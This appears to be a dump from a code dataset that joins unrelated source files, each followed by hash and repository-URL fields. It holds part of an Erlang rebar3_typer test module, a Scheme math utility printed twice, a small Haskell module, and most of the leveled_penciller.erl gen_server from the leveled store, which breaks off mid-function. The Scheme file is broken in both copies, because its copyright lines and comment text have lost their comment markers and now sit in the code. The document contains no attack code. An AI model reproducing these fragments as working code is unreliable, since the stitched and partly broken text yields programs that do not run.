<<"other">> = iolist_to_binary(rebar3_typer_prv:format_error(other)),
{comment, ""}.
get_opts(State) ->
{ok, _} = rebar3_typer_prv:do(State),
receive
#{opts := Opts} ->
lists:sort(
maps:to_list(Opts))
after 500 ->
{error, timeout}
end.
get_error(State) ->
try rebar3_typer_prv:do(State) of
{error, {rebar3_typer_prv, Error}} ->
Error;
Unexpected ->
ct:fail("Unexpected: ~p", [Unexpected])
catch
error:Error ->
Error
end.
get_opts_from(Folder) ->
{ok, Cwd} = file:get_cwd(),
try
ok =
file:set_cwd(
filename:join([code:lib_dir(rebar3_typer), "test", "files", Folder])),
{ok, RebarConfig} = file:consult("rebar.config"),
{ok, State0} =
rebar_prv_app_discovery:init(
rebar_state:new(RebarConfig)),
{ok, State1} = rebar_prv_app_discovery:do(State0),
{ok, State2} = rebar3_typer:init(State1),
get_opts(State2)
after
file:set_cwd(Cwd)
end.
|
21238db9366ea539f3e70a2709ad7f0c2ebee6bdb72e8d75cc175c510d5c269c | pflanze/chj-schemelib | utils.scm | Copyright 2013 - 2017 by < >
;;; This file is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License ( GPL ) as published
by the Free Software Foundation , either version 2 of the License , or
;;; (at your option) any later version.
(require easy
constants)
(define-inline (square@ x)
(declare (flonum) (not safe))
(fl* x x))
(define-inline (freqmod@ x)
0 .. 1 - > 0 .. 1
(declare (flonum) (not safe))
(let* ((min (CONST (log 0.1)))
(max (CONST (log 1.1)))
(x* (log (+ x 0.1))))
(/ (- x* min) (- max min))))
(CONSTANTS)
| null | https://raw.githubusercontent.com/pflanze/chj-schemelib/59ff8476e39f207c2f1d807cfc9670581c8cedd3/math/image/effects/utils.scm | scheme | This file is free software; you can redistribute it and/or modify
(at your option) any later version. | Copyright 2013 - 2017 by < >
it under the terms of the GNU General Public License ( GPL ) as published
by the Free Software Foundation , either version 2 of the License , or
(require easy
constants)
(define-inline (square@ x)
(declare (flonum) (not safe))
(fl* x x))
(define-inline (freqmod@ x)
0 .. 1 - > 0 .. 1
(declare (flonum) (not safe))
(let* ((min (CONST (log 0.1)))
(max (CONST (log 1.1)))
(x* (log (+ x 0.1))))
(/ (- x* min) (- max min))))
(CONSTANTS)
|
37be31c6ae778aef42f0edb1ccbfdbfc589e21894f51b132993cc8d9b62546d4 | csgordon/cayenne | GetPid.hs | module Libs.GetPid(getPid) where
import System.Posix
getPid :: IO Int
getPid =
do
p <- getProcessID
return (read (show p))
| null | https://raw.githubusercontent.com/csgordon/cayenne/7fdf59b5e21124b5caa9f776199a30cd0e5d88b2/Libs/GetPid.hs | haskell | module Libs.GetPid(getPid) where
import System.Posix
getPid :: IO Int
getPid =
do
p <- getProcessID
return (read (show p))
| |
ebc1fa391d18d3e284977ed15fa6199003dc4067578bca39b0d13185a7efc210 | martinsumner/leveled | leveled_penciller.erl | %% -------- PENCILLER ---------
%%
%% The penciller is responsible for writing and re-writing the ledger - a
%% persisted, ordered view of non-recent Keys and Metadata which have been
%% added to the store.
%% - The penciller maintains a manifest of all the files within the current
%% Ledger.
- The Penciller provides re - write ( compaction ) work up to be managed by
the Penciller 's Clerk
- The Penciller can be cloned and maintains a register of clones who have
%% requested snapshots of the Ledger
%% - The accepts new dumps (in the form of a leveled_tree accomponied by
an array of hash - listing binaries ) from the Bookie , and responds either ' ok '
to the bookie if the information is accepted nad the Bookie can refresh its
%% memory, or 'returned' if the bookie must continue without refreshing as the
Penciller is not currently able to accept the update ( potentially due to a
%% backlog of compaction work)
- The Penciller 's persistence of the ledger may not be reliable , in that it
%% may lose data but only in sequence from a particular sequence number. On
startup the Penciller will inform the Bookie of the highest sequence number
it has , and the Bookie should load any missing data from that point out of
%% the journal.
%%
-------- LEDGER ---------
%%
%% The Ledger is divided into many levels
- L0 : New keys are received from the Bookie and and kept in the levelzero
cache , until that cache is the size of a SST file , and it is then persisted
as a SST file at this level . L0 SST files can be larger than the normal
%% maximum size - so we don't have to consider problems of either having more
than one L0 file ( and handling what happens on a crash between writing the
files when the second may have overlapping sequence numbers ) , or having a
%% remainder with overlapping in sequence numbers in memory after the file is
written . Once the persistence is completed , the L0 cache can be erased .
There can be only one SST file at Level 0 , so the work to merge that file
%% to the lower level must be the highest priority, as otherwise writes to the
%% ledger will stall, when there is next a need to persist.
- L1 TO L7 : May contain multiple processes managing non - overlapping SST
%% files. Compaction work should be sheduled if the number of files exceeds
the target size of the level , where the target size is 8 ^ n.
%%
The most recent revision of a Key can be found by checking each level until
%% the key is found. To check a level the correct file must be sought from the
%% manifest for that level, and then a call is made to that file. If the Key
%% is not present then every level should be checked.
%%
%% If a compaction change takes the size of a level beyond the target size,
%% then compaction work for that level + 1 should be added to the compaction
%% work queue.
Compaction work is fetched by the Penciller 's Clerk because :
%% - it has timed out due to a period of inactivity
%% - it has been triggered by the a cast to indicate the arrival of high
%% priority compaction work
The Penciller 's Clerk ( which performs compaction worker ) will always call
the Penciller to find out the highest priority work currently required
%% whenever it has either completed work, or a timeout has occurred since it
%% was informed there was no work to do.
%%
%% When the clerk picks work it will take the current manifest, and the
Penciller assumes the manifest sequence number is to be incremented .
%% When the clerk has completed the work it can request that the manifest
change be committed by the Penciller . The commit is made through changing
the filename of the new manifest - so the Penciller is not held up by the
process of wiritng a file , just altering file system metadata .
%%
%% ---------- PUSH ----------
%%
The Penciller must support the PUSH of a dump of keys from the Bookie . The
%% call to PUSH should be immediately acknowledged, and then work should be
completed to merge the cache update into the L0 cache .
%%
%% The Penciller MUST NOT accept a new PUSH if the Clerk has commenced the
conversion of the current L0 cache into a SST file , but not completed this
change . The Penciller in this case returns the push , and the Bookie should
%% continue to grow the cache before trying again.
%%
%% ---------- FETCH ----------
%%
On request to fetch a key the Penciller should look first in the in - memory
%% L0 tree, then look in the SST files Level by Level (including level 0),
%% consulting the Manifest to determine which file should be checked at each
%% level.
%%
---------- SNAPSHOT ----------
%%
%% Iterators may request a snapshot of the database. A snapshot is a cloned
Penciller seeded not from disk , but by the in - memory and the
in - memory manifest , allowing for direct reference for the SST file processes .
%%
Clones formed to support snapshots are registered by the Penciller , so that
SST files valid at the point of the snapshot until either the iterator is
%% completed or has timed out.
%%
%% ---------- ON STARTUP ----------
%%
On Startup the Bookie with ask the Penciller to initiate the Ledger first .
To initiate the Ledger the must consult the manifest , and then start a SST
%% management process for each file in the manifest.
%%
%% The penciller should then try and read any Level 0 file which has the
manifest sequence number one higher than the last store in the manifest .
%%
The Bookie will ask the Inker for any Keys seen beyond that sequence number
%% before the startup of the overall store can be completed.
%%
---------- ON SHUTDOWN ----------
%%
On a controlled shutdown the Penciller should attempt to write any in - memory
ETS table to a L0 SST file , assuming one is nto already pending . If one is
already pending then the Penciller will not persist this part of the Ledger .
%%
%% ---------- FOLDER STRUCTURE ----------
%%
The following folders are used by the Penciller
%% $ROOT/ledger/ledger_manifest/ - used for keeping manifest files
$ ROOT / ledger / ledger_files/ - containing individual SST files
%%
%% In larger stores there could be a large number of files in the ledger_file
%% folder - perhaps o(1000). It is assumed that modern file systems should
%% handle this efficiently.
%%
---------- COMPACTION & MANIFEST UPDATES ----------
%%
The Penciller can have one and only one Clerk for performing compaction
%% work. When the Clerk has requested and taken work, it should perform the
5 compaction work starting the new SST process to manage the new Ledger state
%% and then write a new manifest file that represents that state with using
%% the next Manifest sequence number as the filename:
%% - nonzero_<ManifestSQN#>.pnd
%%
%% The Penciller on accepting the change should rename the manifest file to -
%% - nonzero_<ManifestSQN#>.crr
%%
On startup , the Penciller should look for the file with the
%% highest such manifest sequence number. This will be started as the
%% manifest, together with any _0_0.sst file found at that Manifest SQN.
Level zero files are not kept in the persisted manifest , and adding a L0
%% file does not advanced the Manifest SQN.
%%
%% The pace at which the store can accept updates will be dependent on the
speed at which the Penciller 's Clerk can merge files at lower levels plus
%% the time it takes to merge from Level 0. As if a clerk has commenced
compaction work at a lower level and then immediately a L0 SST file is
written the Penciller will need to wait for this compaction work to
complete and the L0 file to be compacted before the ETS table can be
%% allowed to again reach capacity
%%
The writing of L0 files do not require the involvement of the clerk .
The L0 files are prompted directly by the penciller when the in - memory tree
%% has reached capacity. This places the penciller in a levelzero_pending
state , and in this state it must return new pushes . Once the SST file has
%% been completed it will confirm completion to the penciller which can then
%% revert the levelzero_pending state, add the file to the manifest and clear
the current level zero in - memory view .
%%
-module(leveled_penciller).
-behaviour(gen_server).
-include("include/leveled.hrl").
-export([
init/1,
handle_call/3,
handle_cast/2,
handle_info/2,
terminate/2,
code_change/3,
format_status/2]).
-export([
pcl_snapstart/1,
pcl_start/1,
pcl_pushmem/2,
pcl_fetchlevelzero/3,
pcl_fetch/4,
pcl_fetchkeys/5,
pcl_fetchkeys/6,
pcl_fetchkeysbysegment/8,
pcl_fetchnextkey/5,
pcl_checksequencenumber/3,
pcl_workforclerk/1,
pcl_manifestchange/2,
pcl_confirml0complete/5,
pcl_confirmdelete/3,
pcl_close/1,
pcl_doom/1,
pcl_releasesnapshot/2,
pcl_registersnapshot/5,
pcl_getstartupsequencenumber/1,
pcl_checkbloomtest/2,
pcl_checkforwork/1,
pcl_persistedsqn/1,
pcl_loglevel/2,
pcl_addlogs/2,
pcl_removelogs/2]).
-export([
sst_rootpath/1,
sst_filename/3]).
-export([
clean_testdir/1]).
-include_lib("eunit/include/eunit.hrl").
%% Module constants.  NOTE: the SLOW_FETCH define line had been lost in this
%% copy (only its trailing comment survived, which is a syntax error); it is
%% restored here - 500000 microseconds, consistent with its "500ms" comment.
-define(MAX_WORK_WAIT, 300).
-define(MANIFEST_FP, "ledger_manifest").
-define(FILES_FP, "ledger_files").
-define(CURRENT_FILEX, "crr").
-define(PENDING_FILEX, "pnd").
-define(SST_FILEX, ".sst").
-define(ARCHIVE_FILEX, ".bak").
-define(SUPER_MAX_TABLE_SIZE, 40000).
-define(PROMPT_WAIT_ONL0, 5).
-define(WORKQUEUE_BACKLOG_TOLERANCE, 4).
-define(COIN_SIDECOUNT, 4).
-define(SLOW_FETCH, 500000). % Log a very slow fetch - longer than 500ms
-define(ITERATOR_SCANWIDTH, 4).
-define(TIMING_SAMPLECOUNTDOWN, 10000).
-define(TIMING_SAMPLESIZE, 100).
-define(OPEN_LASTMOD_RANGE, {0, infinity}).
%% Loop state of the penciller.  NOTE: the persisted_sqn and ledger_sqn
%% field definitions had been lost in this copy (only their trailing
%% comments survived, which is a syntax error inside the record); they are
%% restored here - both are referenced throughout (e.g. in handle_call for
%% get_startup_sqn/persisted_sqn and in push_mem).
-record(state, {manifest ::
                    leveled_pmanifest:manifest() | undefined | redacted,
                query_manifest ::
                    {list(),
                        leveled_codec:ledger_key(),
                        leveled_codec:ledger_key()} | undefined,
                    % Slimmed down version of the manifest containing part
                    % related to specific query, and the StartKey/EndKey
                    % used to extract this part
                persisted_sqn = 0 :: integer(), % The highest SQN persisted
                ledger_sqn = 0 :: integer(), % The highest SQN added to L0
                levelzero_pending = false :: boolean(),
                levelzero_constructor :: pid() | undefined,
                levelzero_cache = [] :: levelzero_cache() | redacted,
                levelzero_size = 0 :: integer(),
                levelzero_maxcachesize :: integer() | undefined,
                levelzero_cointoss = false :: boolean(),
                levelzero_index ::
                    leveled_pmem:index_array() | undefined | redacted,
                levelzero_astree :: list() | undefined | redacted,
                root_path = "test" :: string(),
                clerk :: pid() | undefined,
                is_snapshot = false :: boolean(),
                snapshot_fully_loaded = false :: boolean(),
                snapshot_time :: pos_integer() | undefined,
                source_penciller :: pid() | undefined,
                bookie_monref :: reference() | undefined,
                work_ongoing = false :: boolean(), % i.e. compaction work
                work_backlog = false :: boolean(), % i.e. compaction work
                pending_removals = [] :: list(string()),
                maybe_release = false :: boolean(),
                snaptimeout_short :: pos_integer()|undefined,
                snaptimeout_long :: pos_integer()|undefined,
                monitor = {no_monitor, 0} :: leveled_monitor:monitor(),
                sst_options = #sst_options{} :: sst_options()}).
-type penciller_options() :: #penciller_options{}.
-type bookies_memory() :: {tuple()|empty_cache,
array:array()|empty_array,
integer()|infinity,
integer()}.
-type pcl_state() :: #state{}.
-type levelzero_cacheentry() :: {pos_integer(), leveled_tree:leveled_tree()}.
-type levelzero_cache() :: list(levelzero_cacheentry()).
-type iterator_entry()
:: {pos_integer(),
list(leveled_codec:ledger_kv()|leveled_sst:expandable_pointer())}.
-type iterator() :: list(iterator_entry()).
-type bad_ledgerkey() :: list().
-type sqn_check() :: current|replaced|missing.
-type sst_fetchfun() ::
fun((pid(),
leveled_codec:ledger_key(),
leveled_codec:segment_hash(),
non_neg_integer()) ->
leveled_codec:ledger_kv()|not_present).
-type levelzero_returnfun() :: fun((levelzero_cacheentry()) -> ok).
-type pclacc_fun() ::
fun((leveled_codec:ledger_key(),
leveled_codec:ledger_value(),
any()) -> any()).
-type sst_options() :: #sst_options{}.
-export_type([levelzero_cacheentry/0, levelzero_returnfun/0, sqn_check/0]).
%%%============================================================================
%%% API
%%%============================================================================
-spec pcl_start(penciller_options()) -> {ok, pid()}.
%% @doc
%% Start a penciller using a penciller options record. The start_snapshot
%% option should be used if this is to be a clone of an existing penciller,
%% otherwise the penciller will look in root path for a manifest and
%% associated sst files to start-up from a previous persisted state.
%%
%% When starting a clone a query can also be passed. This prevents the whole
%% Level Zero memory space from being copied to the snapshot, instead the
%% query is run against the level zero space and just the query results are
%% copied into the clone.
pcl_start(PCLopts) ->
    % Linked start - a primary penciller shares fate with its caller
    gen_server:start_link(?MODULE, [leveled_log:get_opts(), PCLopts], []).
-spec pcl_snapstart(penciller_options()) -> {ok, pid()}.
%% @doc
%% Don't link to the bookie - this is a snpashot
pcl_snapstart(PCLopts) ->
    % Unlinked start - a snapshot exiting must not take the caller down
    gen_server:start(?MODULE, [leveled_log:get_opts(), PCLopts], []).
-spec pcl_pushmem(pid(), bookies_memory()) -> ok|returned.
%% @doc
%% Load the contents of the Bookie's memory of recent additions to the Ledger
%% to the Ledger proper.
%%
%% The load is made up of a cache in the form of a leveled_skiplist tuple (or
%% the atom empty_cache if no cache is present), an index of entries in the
%% skiplist in the form of leveled_pmem index (or empty_index), the minimum
%% sequence number in the cache and the maximum sequence number.
%%
%% If the penciller does not have capacity for the pushed cache it will
%% respond with the atom 'returned'. This is a signal to hold the memory
%% at the Bookie, and try again soon.  This normally only occurs when there
%% is a backlog of merges - so the bookie should backoff for longer each time.
pcl_pushmem(Pid, LedgerCache) ->
    %% Bookie to dump memory onto penciller
    gen_server:call(Pid, {push_mem, LedgerCache}, infinity).
-spec pcl_fetchlevelzero(pid(),
non_neg_integer(),
fun((levelzero_cacheentry()) -> ok))
-> ok.
%% @doc
%% Allows a single slot of the penciller's levelzero cache to be fetched.  The
%% levelzero cache can be up to 40K keys - sending this to the process that is
%% persisting this in a SST file in a single cast will lock the process for
%% 30-40ms. This allows that process to fetch this slot by slot, so that
%% this is split into a series of smaller events.
%%
%% The return value will be a leveled_skiplist that forms that part of the
%% cache
pcl_fetchlevelzero(Pid, Slot, ReturnFun) ->
    % Timeout to cause crash of L0 file when it can't get the close signal
    % as it is deadlocked making this call.
    %
    % If the timeout gets hit outside of close scenario the Penciller will
    % be stuck in L0 pending
    gen_server:cast(Pid, {fetch_levelzero, Slot, ReturnFun}).
-spec pcl_fetch(pid(), leveled_codec:ledger_key())
-> leveled_codec:ledger_kv()|not_present.
%% @doc
%% Fetch a key, return the first (highest SQN) occurrence of that Key along
%% with the value.
%%
%% The Key needs to be hashable (i.e. have a tag which indicates that the key
%% can be looked up) - index entries are not hashable for example.
%%
%% If the hash is already known, call pcl_fetch/3 as segment_hash is a
%% relatively expensive hash function
pcl_fetch(Pid, Key) ->
    Hash = leveled_codec:segment_hash(Key),
    if
        Hash /= no_lookup ->
            % Deliberate: a non-hashable key is a caller error, so there is
            % no fallback clause - this crashes with if_clause instead
            gen_server:call(Pid, {fetch, Key, Hash, true}, infinity)
    end.
-spec pcl_fetch(pid(),
leveled_codec:ledger_key(),
leveled_codec:segment_hash(),
boolean()) -> leveled_codec:ledger_kv()|not_present.
%% @doc
%% Fetch a key, return the first (highest SQN) occurrence of that Key along
%% with the value.
%%
%% Hash should be result of leveled_codec:segment_hash(Key)
pcl_fetch(Pid, Key, Hash, UseL0Index) ->
    % Hash must be the result of leveled_codec:segment_hash(Key)
    gen_server:call(Pid, {fetch, Key, Hash, UseL0Index}, infinity).
-spec pcl_fetchkeys(pid(),
leveled_codec:ledger_key(),
leveled_codec:ledger_key(),
pclacc_fun(), any(), as_pcl|by_runner) -> any().
%% @doc
%% Run a range query between StartKey and EndKey (inclusive).  This will cover
%% all keys in the range - so must only be run against snapshots of the
%% penciller to avoid blocking behaviour.
%%
%% Comparison with the upper-end of the range (EndKey) is done using
%% leveled_codec:endkey_passed/2 - so use nulls within the tuple to manage
%% the top of the range.  Comparison with the start of the range is based on
%% Erlang term order.
pcl_fetchkeys(Pid, StartKey, EndKey, AccFun, InitAcc) ->
    % Fold runs within the penciller process (as_pcl)
    pcl_fetchkeys(Pid, StartKey, EndKey, AccFun, InitAcc, as_pcl).
pcl_fetchkeys(Pid, StartKey, EndKey, AccFun, InitAcc, By) ->
    % No segment filter (false), no last-modified range (false), and no
    % limit on the number of keys folded over (-1)
    Query =
        {fetch_keys,
            StartKey, EndKey,
            AccFun, InitAcc,
            false, false, -1,
            By},
    gen_server:call(Pid, Query, infinity).
-spec pcl_fetchkeysbysegment(pid(),
leveled_codec:ledger_key(),
leveled_codec:ledger_key(),
pclacc_fun(), any(),
leveled_codec:segment_list(),
false | leveled_codec:lastmod_range(),
boolean()) -> any().
%% @doc
%% Run a range query between StartKey and EndKey (inclusive).  This will cover
%% all keys in the range - so must only be run against snapshots of the
%% penciller to avoid blocking behaviour.
%%
%% This version allows an additional input of a SegmentList.  This is a list
%% of 16-bit integers representing the segment IDs band ((2 ^ 16) - 1) that
%% are interesting to the fetch
%%
%% Note that segment must be false unless the object Tag supports additional
%% indexing by segment. This cannot be used on ?IDX_TAG and other tags that
%% use the no_lookup hash
pcl_fetchkeysbysegment(Pid, StartKey, EndKey, AccFun, InitAcc,
                        SegmentList, LastModRange, LimitByCount) ->
    % When limiting by count, the passed-in accumulator must be a pair of
    % {MaxKeyCount, Acc}; otherwise a MaxKeys of -1 means no limit
    {MaxKeys, InitAcc0} =
        if
            LimitByCount ->
                InitAcc;
            true ->
                {-1, InitAcc}
        end,
    % Always returns a runner fun (by_runner) rather than folding in-process
    Query =
        {fetch_keys,
            StartKey, EndKey, AccFun, InitAcc0,
            SegmentList, LastModRange, MaxKeys,
            by_runner},
    gen_server:call(Pid, Query, infinity).
-spec pcl_fetchnextkey(pid(),
leveled_codec:ledger_key(),
leveled_codec:ledger_key(),
pclacc_fun(), any()) -> any().
%% @doc
%% Run a range query between StartKey and EndKey (inclusive).  This has the
%% same constraints as pcl_fetchkeys/5, but will only return the first key
%% found in erlang term order.
pcl_fetchnextkey(Pid, StartKey, EndKey, AccFun, InitAcc) ->
    % MaxKeys of 1 halts the fold after the first key is accumulated
    gen_server:call(Pid,
                    {fetch_keys,
                        StartKey, EndKey,
                        AccFun, InitAcc,
                        false, false, 1,
                        as_pcl},
                    infinity).
-spec pcl_checksequencenumber(pid(),
leveled_codec:ledger_key()|bad_ledgerkey(),
integer()) -> sqn_check().
%% @doc
%% Check if the sequence number of the passed key is not replaced by a change
%% after the passed sequence number. Will return:
%% - current
%% - replaced
%% - missing
pcl_checksequencenumber(Pid, Key, SQN) ->
    Hash = leveled_codec:segment_hash(Key),
    if
        Hash /= no_lookup ->
            % Deliberate crash (if_clause) for non-hashable keys - only
            % lookup-capable keys can be SQN-checked
            gen_server:call(Pid, {check_sqn, Key, Hash, SQN}, infinity)
    end.
-spec pcl_workforclerk(pid()) -> ok.
%% @doc
%% A request from the clerk to check for work. If work is present the
%% Penciller will cast back to the clerk, no response is sent to this
%% request.
pcl_workforclerk(Pid) ->
    % Async - any available work is cast back to the clerk, not replied here
    gen_server:cast(Pid, work_for_clerk).
-spec pcl_manifestchange(pid(), leveled_pmanifest:manifest()) -> ok.
%% @doc
%% Provide a manifest record (i.e. the output of the leveled_pmanifest module)
%% that is required to beocme the new manifest.
pcl_manifestchange(Pid, Manifest) ->
    % The clerk proposes a new manifest built from completed merge work
    gen_server:cast(Pid, {manifest_change, Manifest}).
-spec pcl_confirml0complete(pid(),
string(),
leveled_codec:ledger_key(),
leveled_codec:ledger_key(),
binary()) -> ok.
%% @doc
%% Allows a SST writer that has written a L0 file to confirm that the file
%% is now complete, so the filename and key ranges can be added to the
%% manifest and the file can be used in place of the in-memory levelzero
%% cache.
pcl_confirml0complete(Pid, FN, StartKey, EndKey, Bloom) ->
    % Cast from the SST writer once the L0 file has been persisted
    gen_server:cast(Pid, {levelzero_complete, FN, StartKey, EndKey, Bloom}).
-spec pcl_confirmdelete(pid(), string(), pid()) -> ok.
%% @doc
%% Poll from a delete_pending file requesting a message if the file is now
%% ready for deletion (i.e. all snapshots which depend on the file have
%% finished)
pcl_confirmdelete(Pid, FileName, FilePid) ->
    % Poll from a delete_pending SST file; confirmation arrives by cast back
    gen_server:cast(Pid, {confirm_delete, FileName, FilePid}).
-spec pcl_getstartupsequencenumber(pid()) -> integer().
%% @doc
%% At startup the penciller will get the largest sequence number that is
%% within the persisted files. This function allows for this sequence number
%% to be fetched - so that it can be used to determine parts of the Ledger
%% which may have been lost in the last shutdown (so that the ledger can
%% be reloaded from that point in the Journal)
pcl_getstartupsequencenumber(Pid) ->
    % Highest SQN within the persisted (on-disk) part of the Ledger
    gen_server:call(Pid, get_startup_sqn, infinity).
-spec pcl_registersnapshot(pid(),
pid(),
no_lookup|{tuple(), tuple()}|undefined,
bookies_memory(),
boolean())
-> {ok, pcl_state()}.
%% @doc
%% Register a snapshot of the penciller, returning a state record from the
%% penciller for the snapshot to use as its LoopData
pcl_registersnapshot(Pid, Snapshot, Query, BookiesMem, LR) ->
    % Returns a state record seeded from the source penciller's view, to
    % be used as the clone's loop state
    Msg = {register_snapshot, Snapshot, Query, BookiesMem, LR},
    gen_server:call(Pid, Msg, infinity).
-spec pcl_releasesnapshot(pid(), pid()) -> ok.
%% @doc
%% Inform the primary penciller that a snapshot is finished, so that the
%% penciller can allow deletes to proceed if appropriate.
pcl_releasesnapshot(Pid, Snapshot) ->
    % De-register so the primary penciller may let pending deletes proceed
    gen_server:cast(Pid, {release_snapshot, Snapshot}).
-spec pcl_persistedsqn(pid()) -> integer().
%% @doc
%% Return the persisted SQN, the highest SQN which has been persisted into the
%% Ledger
pcl_persistedsqn(Pid) ->
    % Highest SQN persisted into the Ledger (excludes level-zero memory)
    gen_server:call(Pid, persisted_sqn, infinity).
-spec pcl_close(pid()) -> ok.
%% @doc
%% Close the penciller neatly, trying to persist to disk anything in the memory
pcl_close(Pid) ->
    % 60s timeout - close may need to roll level-zero memory to disk
    gen_server:call(Pid, close, 60000).
-spec pcl_doom(pid()) -> {ok, list()}.
%% @doc
%% Close the penciller neatly, trying to persist to disk anything in the memory
%% Return a list of filepaths from where files exist for this penciller (should
%% the calling process which to erase the store).
pcl_doom(Pid) ->
    % As close, but also returns the ledger folder paths for erasure
    gen_server:call(Pid, doom, 60000).
-spec pcl_checkbloomtest(pid(), tuple()) -> boolean().
%% @doc
%% Function specifically added to help testing. In particular to make sure
%% that blooms are still available after pencllers have been re-loaded from
%% disk.
pcl_checkbloomtest(Pid, Key) ->
    Hash = leveled_codec:segment_hash(Key),
    if
        Hash /= no_lookup ->
            % Test-only; deliberate if_clause crash for non-hashable keys
            gen_server:call(Pid, {checkbloom_fortest, Key, Hash}, 2000)
    end.
-spec pcl_checkforwork(pid()) -> boolean().
%% @doc
%% Used in test only to confim compaction work complete before closing
pcl_checkforwork(Pid) ->
    % Test-only - true if any compaction work is outstanding
    gen_server:call(Pid, check_for_work, 2000).
-spec pcl_loglevel(pid(), leveled_log:log_level()) -> ok.
%% @doc
%% Change the log level of the Penciller
pcl_loglevel(Pid, LogLevel) ->
    % Update the log level used by this penciller process
    gen_server:cast(Pid, {log_level, LogLevel}).
-spec pcl_addlogs(pid(), list(string())) -> ok.
%% @doc
%% Add to the list of forced logs, a list of more forced logs
pcl_addlogs(Pid, ForcedLogs) ->
    % Extend the set of log references that are always emitted
    gen_server:cast(Pid, {add_logs, ForcedLogs}).
-spec pcl_removelogs(pid(), list(string())) -> ok.
%% @doc
%% Remove from the list of forced logs, a list of forced logs
pcl_removelogs(Pid, ForcedLogs) ->
    % Remove log references from the forced set
    gen_server:cast(Pid, {remove_logs, ForcedLogs}).
%%%============================================================================
%%% gen_server callbacks
%%%============================================================================
init([LogOpts, PCLopts]) ->
    leveled_log:save(LogOpts),
    leveled_rand:seed(),
    % A snapshot is requested with root_path undefined and start_snapshot
    % true; a primary penciller is started from the files under root_path
    case {PCLopts#penciller_options.root_path,
            PCLopts#penciller_options.start_snapshot,
            PCLopts#penciller_options.snapshot_query,
            PCLopts#penciller_options.bookies_mem} of
        {undefined, _Snapshot=true, Query, BookiesMem} ->
            SrcPenciller = PCLopts#penciller_options.source_penciller,
            LongRunning = PCLopts#penciller_options.snapshot_longrunning,
            %% monitor the bookie, and close the snapshot when bookie
            %% exits
            BookieMonitor =
                erlang:monitor(process, PCLopts#penciller_options.bookies_pid),
            % Seed this clone's state from the source penciller's view
            {ok, State} = pcl_registersnapshot(SrcPenciller,
                                                self(),
                                                Query,
                                                BookiesMem,
                                                LongRunning),
            leveled_log:log(p0001, [self()]),
            {ok, State#state{is_snapshot = true,
                                bookie_monref = BookieMonitor,
                                source_penciller = SrcPenciller}};
        {_RootPath, _Snapshot=false, _Q, _BM} ->
            start_from_file(PCLopts)
    end.
handle_call({push_mem, {LedgerTable, PushedIdx, MinSQN, MaxSQN}},
                _From,
                State=#state{is_snapshot=Snap}) when Snap == false ->
    % The push_mem process is as follows:
    %
    % 1. If either the penciller is still waiting on the last L0 file to be
    % written, or there is a work backlog - the cache is returned with the
    % expectation that PUTs should be slowed.  Also if the cache has reached
    % the maximum number of lines (by default after 31 pushes from the bookie)
    %
    % 2. If (1) does not apply, the bookie's cache will be added to the
    % penciller's cache.
    SW = os:timestamp(),
    L0Pending = State#state.levelzero_pending,
    WorkBacklog = State#state.work_backlog,
    CacheAlreadyFull = leveled_pmem:cache_full(State#state.levelzero_cache),
    L0Size = State#state.levelzero_size,
    % The clerk is prompted into action as there may be a L0 write required
    ok = leveled_pclerk:clerk_prompt(State#state.clerk),
    case L0Pending or WorkBacklog or CacheAlreadyFull of
        true ->
            % Cannot update the cache, or roll the memory so reply `returned`
            % The Bookie must now retain the ledger cache and try to push the
            % updated cache at a later time
            leveled_log:log(
                p0018,
                [L0Size, L0Pending, WorkBacklog, CacheAlreadyFull]),
            {reply, returned, State};
        false ->
            % Return ok as cache has been updated on State and the Bookie
            % should clear its ledger cache which is now with the Penciller
            PushedTree =
                case is_tuple(LedgerTable) of
                    true ->
                        LedgerTable;
                    false ->
                        leveled_tree:from_orderedset(LedgerTable, ?CACHE_TYPE)
                end,
            case leveled_pmem:add_to_cache(
                    L0Size,
                    {PushedTree, MinSQN, MaxSQN},
                    State#state.ledger_sqn,
                    State#state.levelzero_cache,
                    true) of
                empty_push ->
                    {reply, ok, State};
                {UpdMaxSQN, NewL0Size, UpdL0Cache} ->
                    % Index the pushed keys against the new cache line
                    UpdL0Index =
                        leveled_pmem:add_to_index(
                            PushedIdx,
                            State#state.levelzero_index,
                            length(State#state.levelzero_cache) + 1),
                    leveled_log:log_randomtimer(
                        p0031,
                        [NewL0Size, true, true, MinSQN, MaxSQN], SW, 0.1),
                    {reply,
                        ok,
                        State#state{
                            levelzero_cache = UpdL0Cache,
                            levelzero_size = NewL0Size,
                            levelzero_index = UpdL0Index,
                            ledger_sqn = UpdMaxSQN}}
            end
    end;
handle_call({fetch, Key, Hash, UseL0Index}, _From, State) ->
    % Fetch the current (highest SQN) value for the Key.  When UseL0Index
    % is false no level-zero index is passed to the fetch
    L0Idx =
        case UseL0Index of
            true ->
                State#state.levelzero_index;
            false ->
                none
        end,
    R =
        timed_fetch_mem(
            Key, Hash, State#state.manifest,
            State#state.levelzero_cache, L0Idx,
            State#state.monitor),
    {reply, R, State};
handle_call({check_sqn, Key, Hash, SQN}, _From, State) ->
    % Compare the Key's current SQN in the ledger against the passed SQN;
    % replies with a sqn_check() of current | replaced | missing
    {reply,
        compare_to_sqn(
            fetch_sqn(
                Key,
                Hash,
                State#state.manifest,
                State#state.levelzero_cache,
                State#state.levelzero_index),
            SQN),
        State};
handle_call({fetch_keys,
                    StartKey, EndKey,
                    AccFun, InitAcc,
                    SegmentList, LastModRange, MaxKeys, By},
                _From,
                State=#state{snapshot_fully_loaded=Ready})
                                                        when Ready == true ->
    % Range queries may only run on a fully-loaded snapshot (guard above)
    LastModRange0 =
        case LastModRange of
            false ->
                ?OPEN_LASTMOD_RANGE;
            R ->
                R
        end,
    SW = os:timestamp(),
    % Merge the level-zero cache into a list for the range, unless this
    % clone was seeded with a pre-merged tree for a specific query
    L0AsList =
        case State#state.levelzero_astree of
            undefined ->
                leveled_pmem:merge_trees(StartKey,
                                            EndKey,
                                            State#state.levelzero_cache,
                                            leveled_tree:empty(?CACHE_TYPE));
            List ->
                List
        end,
    % Apply any segment filter to the level-zero results up-front
    FilteredL0 =
        case SegmentList of
            false ->
                L0AsList;
            _ ->
                TunedList = leveled_sst:tune_seglist(SegmentList),
                FilterFun =
                    fun(LKV) ->
                        CheckSeg =
                            leveled_sst:extract_hash(
                                leveled_codec:strip_to_segmentonly(LKV)),
                        leveled_sst:member_check(CheckSeg, TunedList)
                    end,
                lists:filter(FilterFun, L0AsList)
        end,
    leveled_log:log_randomtimer(
        p0037, [State#state.levelzero_size], SW, 0.01),
    %% Rename any reference to loop state that may be used by the function
    %% to be returned -
    SSTiter =
